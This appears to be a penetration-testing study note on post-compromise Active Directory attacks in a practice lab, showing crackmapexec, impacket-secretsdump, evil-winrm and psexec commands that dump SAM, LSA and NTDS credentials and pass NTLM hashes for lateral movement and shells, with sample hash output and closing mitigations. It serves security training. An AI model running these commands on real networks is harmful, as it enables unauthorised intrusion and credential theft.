Post Compromise Attacks
PRACTICE ! PRACTICE ! PRACTICE !
Pass the Password Attacks
If we crack a potential password and or can dump the SAM hashes, either ways we can use both of these to move laterally into the network !
$ crackmapexec 192.168.169.0/24 -u fcastle -d MARVEL -p Password1
$ crackmapexec 192.168.169.0/24 -u fcastle -d MARVEL -p Password1 --sam
$ crackmapexec 192.168.169.0/24 -u fcastle -d MARVEL -p Password1 --lsa
$ crackmapexec 192.168.169.0/24 -u fcastle -d MARVEL -p Password1 --ntds
$ crackmapexec 192.168.169.0/24 -u fcastle -d MARVEL -H <NTLM Hash>

Do not spray the potential passwords on domain accounts because for an example there are 50 machines in a network, the username is still valid but the password isn't and if the suppose the tool which authenticates the domain accounts, fails continously - High chances are there for the domain account to get locked ( due to lockout policy of the user accounts on the domain )
Pass the Hash Attacks
Let's dump some hashes using secretsdump
$ impacket-secretsdump 'MARVEL/fcastle:Password1@192.168.169.133'

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Whenever we dump the SAM file, we have a (uid : rid : lmhash : nthash)
Upon cracking the nthash, Administrator account doesn't give anything => It's been disabled ( shows nothing, a blank field), whereas Frank Castle's hash returns => Password1
We can pass NTLM hashes around the network but we cannot pass NTLMv2 hashes
Now let's pass the hash instead of providing the password :)
$ crackmapexec smb 192.168.169.0/24 -u 'Frank Castle' -H 64f12cddaa88057e06a81b54e73b949b --local-auth
$ evil-winrm -i 10.10.10.100 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

We can even pass the hash via impacket's psexec and gain a shell on the machine !
$ impacket-psexec 'marvel/fcastle@192.168.169.133 -hashes <lmhash>:<nthash>

Mitigation Strategies
Hard to prevent it completely, but we can make it more difficult for an attacker to attack !
Limit account re-use
- Avoid re-using local admin password
- Disable guest and administrator accounts
- Limit who is a local administrator
Utilize Strong Passwords
- The Longer the better ( above 14 characters )
- Avoid using common words, instead use long sentences
Privilege Access Management (PAM)
- Check out/in for sensitive accounts when needed
- Automatically rotate passwords on check-out and check-in
- Limits pass attacks as hash/password is strong and constantly rotated
Last updated